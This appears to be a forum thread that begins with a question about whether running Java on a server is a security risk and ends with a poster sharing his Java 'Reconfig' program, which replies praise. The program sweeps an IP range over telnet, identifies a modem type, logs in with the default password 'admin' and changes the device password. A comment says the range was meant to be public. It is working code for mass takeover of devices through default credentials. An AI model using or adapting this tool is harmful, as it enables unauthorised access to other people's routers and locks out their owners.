we have been debating about this question where i work for a while...
we had an issue and i wrote a small code to fix it... however it is in java, another dude is saying that my code should not run on the server 'cause java is not secure and that they we should do it in PHP (by "we" he means "i"). we have to install java SDK or runtime .
i still can't get how it can 'cause a security risk if no browsing is done on the server, the code doesn't require any user input... i don't know am just confused.
so help please :/
is it secure to run java SDK on a server.
is it secure to run java SDK on a server.
There is an UNEQUAL amount of good and bad in most things, the trick is to work out the ratio and act accordingly. "The Jester"
-
bad_brain
- Site Owner
- Posts: 11636
- Joined: 06 Apr 2005, 16:00
- 19
- Location: In your eye floaters.
- Contact:
Re: is it secure to run java SDK on a server.
why should Java be insecure? ask for a specific example, and I am sure he can't name one.....enough Apache Tomcat servers out there, and they are also not "insecure".
I guess he's just too lazy to set it up...
if everything is up to date there is absolutely no reason not to use Java....there have been some vulnerabilities, but if you don't install software that "had flaws some day" you end up with an empty HDD. 
I guess he's just too lazy to set it up...
if everything is up to date there is absolutely no reason not to use Java....there have been some vulnerabilities, but if you don't install software that "had flaws some day" you end up with an empty HDD. 
Re: is it secure to run java SDK on a server.
The only real reason to not run Java, is that it eats a lot of memory and manages your memory by itself (CPU consuming).
It's not more secure/insecure than other solutions, as b_b said ^^
It's not more secure/insecure than other solutions, as b_b said ^^
"The best place to hide a tree, is in a forest"
Re: is it secure to run java SDK on a server.
OK they may go to hell...
3 days and my script is done and totally correct and they didn't give a damn care (:
the only reason is that someone want to show off here and hate the competition...
so i decided to publish it here: http://code.suck-o.com/42395
3 days and my script is done and totally correct and they didn't give a damn care (:
the only reason is that someone want to show off here and hate the competition...
so i decided to publish it here: http://code.suck-o.com/42395
commons-net.jar is name of the package that you will download.save the code in a file named Reconfig.jar
to compile download and the org.apache.commons.net from http://www.java2s.com/Code/Jar/ABC/Down ... netjar.htm extract it in the same directory as Reconfig.jar and run the following command: "javac -cp .;commons-net.jar Reconfig.java"
then to run it for test type: "java -cp .;commons-net.jar Reconfig"
Code: Select all
import org.apache.commons.net.telnet.*; // http://www.java2s.com/Code/Jar/ABC/Downloadcommonsnetjar.htm
import java.io.*;
class Reconfig{
public static String readUntil( String pattern, InputStream in ) {
try {
char lastChar = pattern.charAt( pattern.length() - 1 );
StringBuffer sb = new StringBuffer();
boolean found = false;
char ch = ( char )in.read();
while( true ) {
System.out.print( ch );
sb.append( ch );
if( ch == lastChar ) {
if( sb.toString().endsWith( pattern ) ) {
return sb.toString();
}
}
ch = ( char )in.read();
}
}
catch( Exception e ) {
e.printStackTrace();
}
return null;
}
public static void write( String value,PrintStream out) {
try {
out.println( value );
out.flush();
System.out.println( value );
}
catch( Exception e ) {
e.printStackTrace();
}
}
public static void main(String [] arg)throws IOException{
String _PASSWORD = "somepassword";
String _DEFAULT_PASSWORD = "admin";
TelnetClient telnet = new TelnetClient();
InputStream in;
PrintStream out;
String _network = "192.168.51."; // this was supposed to be a public IP range.
for(int i = 1 ; i < 254 ; i++){
try{
System.out.println("Testing -> "+_network+Integer.toString(i));
telnet.connect(_network+Integer.toString(i),23);
}
catch(Exception e){
System.out.println(_network+Integer.toString(i)+"\t\t Problem upon Connection, host can be Offline");
continue;}
in = telnet.getInputStream();
out = new PrintStream( telnet.getOutputStream() );
String test_length = readUntil(": ", in); //after the connection is opened i read the incomming stream until i get a ":"
if(test_length.length() == 12) // i test the length 'cause some modem reply with Login: but the kind of modem that am targeting
{ // ask for the password directly and it send " Password: " so if th elength of the reply is 12, the modem is X
write(_DEFAULT_PASSWORD, out); // here i use the write the function previously defined to send the default password
if(in.available() == 76) // if the authenthication was correct the reply length will be equal to 76
{ //i could have use other techniques such readUntil() but i guess this way is faster and it guaranteed as well
write("sys password "+ _PASSWORD, out); //send the command that change the pass.
System.out.println(_network+Integer.toString(i)+"\t\t Password Changed.");
in.close();
}
else // block entered when auth fails.
{
try{telnet.disconnect();}catch(Exception e){}
System.out.println(_network+Integer.toString(i)+"\t\t Failed to login. Wrong password");
in.close();
}
}
else{
try{telnet.disconnect();}catch(Exception e){} // disconnect both way
}
}
}
}
/*---__-_-__-____---_-__---__---_----_--_____--_____----__*/
/*******> Coded by l0ngb1t <*******/
/**> From www.suck-o.com <**/
/*******> Mind Over Matter <********/
/*--__-_-___-_-___---___--_-___--____---__-__---___-----__*/There is an UNEQUAL amount of good and bad in most things, the trick is to work out the ratio and act accordingly. "The Jester"
Re: is it secure to run java SDK on a server.
Nice piece of code 
Good job!
Good job!
"The best place to hide a tree, is in a forest"